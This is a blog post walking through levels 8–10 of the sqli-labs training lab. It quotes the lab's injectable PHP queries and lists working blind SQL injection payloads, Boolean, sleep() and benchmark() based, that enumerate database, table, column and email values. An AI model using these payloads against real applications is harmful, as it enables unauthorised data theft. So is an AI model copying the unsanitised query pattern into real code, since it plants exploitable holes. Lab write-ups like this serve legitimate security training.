Sqli labs (8~10) customs clearance notes

Less-8 (GET blind Boolean based single quotation mark) GET type Boolean blind annotation based on single quotation mark

php key code is as follows

<?php
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}
?>

Analysis of the code shows that the page will only return two results

You are in The

Errors are not displayed and MySQL is commented out_ Error() and syntax error

In this case, we can use Boolean blind injection or DNSlog injection. Here, we can use Boolean blind injection first (because I haven't understood the principle of the second one)

Introduction to Boolean blind note

Blind injection means that during the sql injection process, the selected data cannot be echoed to the front page when the sql statement is executed. At this point, we need to use some methods to judge whether our query is successful. This process is called blind annotation.

Utilization scenarios

There is no display bit on the page, and no SQL statement execution error information is output. You can only judge whether the page is normal or abnormal

Injection process

Judge whether there is injection

?id=1' and 1=1 --+ ?id=1' and 1=2 --+ perhaps ?id=1'%23


The length of the database can be determined by the burst module of burp. The $8$range is set between 1-128

?id=1' and length(database())=8 --+  

 
Blasting the database name with ascii code can also start the start position and the value of ascii code to blast the mid (string, start, intercept length)

?id=1' and ascii(mid(database(),1,1))=1 --+     


Use substr to explode the table name to get emails substr (string, start, intercept length)

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+


Blasting column name to get column name id,email_id

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=101 --+


Get data

?id=1' and ascii(substr((select email_id from security.emails limit 0,1),1,1))=101 --+

Less-9 (GET blind time based single quotes) GET type time blind annotation based on single quotation marks

php key code is as follows

<?php	
if($row)
{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    echo "</font>";
  	}
else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';		
	}
}
	else { echo "Please input the ID as parameter with numeric value";}
?>

Analysis of the code shows that no matter whether the input is correct or wrong, the result page will only return one result You are in The

Boolean blind injection doesn't work, so we consider time blind injection

Utilization scenarios

There is no display bit on the page, and no error statement is output. The correct sql statement is consistent with the wrong sql statement page

correlation function

If (parameter 1, parameter 2, parameter 3)

Parameter 1 is a condition that can return a Boolean value. When the result returned by parameter 1 is true, parameter 2 (or the result) is executed; otherwise, parameter 3 (or the result) is executed.

ascii("character")

Converts the specified character to ascii code. If the given parameter is a string, the command converts the first character.

Substr (parameter 1, parameter 2, parameter 3)

This function is used to intercept a string. Parameter 1 is the specified string, parameter 2 is the starting position (1 represents the first character), and parameter 3 is the intercept length. The

benchmark(arg1,arg2)

Function: arg1 operation times, arg2 is an expression
The BENCHMARK() function repeats the expression arg2 for arg1 times. It can be used to calculate the speed at which MYSQL processes expressions. The result value is usually 0.

Example: if(payload,benchmark(500000000),1); If the test statement is correct, pause for about a few seconds, which is greatly affected by the server

mysql> select if(2>1,benchmark(50000000,md5(123456)),1);
+-------------------------------------------+
| if(2>1,benchmark(50000000,md5(123456)),1) |
+-------------------------------------------+
|                                         0 |
+-------------------------------------------+
1 row in set (9.91 sec)
mysql> select if(2>1,benchmark(50000000,md5(123456)),1);
+-------------------------------------------+
| if(2>1,benchmark(50000000,md5(123456)),1) |
+-------------------------------------------+
|                                         0 |
+-------------------------------------------+
1 row in set (9.91 sec)

Injection process

Judge whether there is injection
?id=1' and sleep(10) --+
Judge database length
?id=1' and if(length(database())=8,sleep(5),1) --+
Intercept database string	obtain security
?id=1' and if (substr(database(),1,1)='s',sleep(5),1) --+
?id=1' and if (ascii(substr(database(),1,1))=115,sleep(10),1) --+
Blasting table name obtained emails	
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(10),1) --+
Obtained by blasting column name id,email_id
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105,sleep(10),1) --+
Get data
?id=1' and if(ascii(substr((select email_id from security.emails limit 0,1),1,1))=68,sleep(10),1) --+

emmm this kind of time blind injection with burst blasting is also troublesome. After learning python, you can write exp script blasting. This is mainly to understand the principle and function use

Less-10 (GET blind time based double quotes) GET type time blind annotation based on double quotation marks

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

It is different from the Ninth level in that it is wrapped in double quotation marks

Tags: MySQL PHP programming language sqli-labs

Posted by siko on Mon, 30 May 2022 02:45:49 +0530